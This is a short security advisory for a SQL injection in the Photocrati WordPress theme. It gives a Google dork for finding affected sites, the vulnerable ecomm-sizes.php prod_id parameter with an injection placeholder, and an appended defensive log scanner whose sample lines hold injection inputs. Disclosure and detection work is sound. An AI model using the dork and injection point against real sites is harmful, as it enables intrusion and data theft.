WordPress Photocrati Theme 4.x.x SQL Injection

2015.03.03
Credit: [ ayastar ]
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]

-------- details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes

attacker can do a remote injection in site URL to get some sensitive information.
=======================================================
Exploit code :

http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]

greetz to all muslims :) from morocco
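
For defenders reviewing web server logs, the following added example (not part of the original advisory and not Photocrati code) flags requests to the ecomm-sizes.php script whose prod_id is not a plain integer. It assumes combined-format access logs and that a legitimate prod_id is a short unsigned integer; the theme directory name, client addresses and log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# The advisory's script path, with any theme directory name in the middle.
SCRIPT_RE = re.compile(r'/wp-content/themes/[^/]+/ecomm-sizes\.php', re.I)
# Assumption: a legitimate prod_id is a short unsigned integer.
VALID_ID_RE = re.compile(r'[0-9]{1,10}')

def suspicious_prod_id(log_line):
    """Return the decoded prod_id values that are not plain integers."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    # Decode the path so a percent-encoded script name is still recognised.
    if not SCRIPT_RE.fullmatch(unquote(url.path)):
        return []
    # parse_qs percent-decodes values and keeps repeated parameters as a list,
    # so a benign first prod_id cannot hide a second, malformed one.
    values = parse_qs(url.query, keep_blank_values=True).get("prod_id", [])
    return [v for v in values if not VALID_ID_RE.fullmatch(v)]

def scan(lines):
    """Return (client_ip, bad_values) for every log line that needs review."""
    hits = []
    for line in lines:
        bad = suspicious_prod_id(line)
        if bad:
            hits.append((line.split(" ", 1)[0], bad))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up theme directory).
_BASE = "/wp-content/themes/photocrati-theme"
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Mar/2015:10:00:01 +0000] "GET %s/ecomm-sizes.php?prod_id=42 HTTP/1.1" 200 512' % _BASE,
    '203.0.113.9 - - [03/Mar/2015:10:00:05 +0000] "GET %s/ecomm-sizes.php?prod_id=42%%27 HTTP/1.1" 200 0' % _BASE,
    '203.0.113.9 - - [03/Mar/2015:10:00:09 +0000] "GET %s/ecomm-sizes.php?prod_id=7&prod_id=7+OR+1%%3D1 HTTP/1.1" 200 734' % _BASE,
    '198.51.100.7 - - [03/Mar/2015:10:00:12 +0000] "GET %s/style.css?prod_id=x HTTP/1.1" 200 90' % _BASE,
]

if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(ip, bad)
```

Hits from this check are review candidates, not proof of compromise; the durable fix is for the script to cast prod_id to an integer or bind it as a query parameter.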

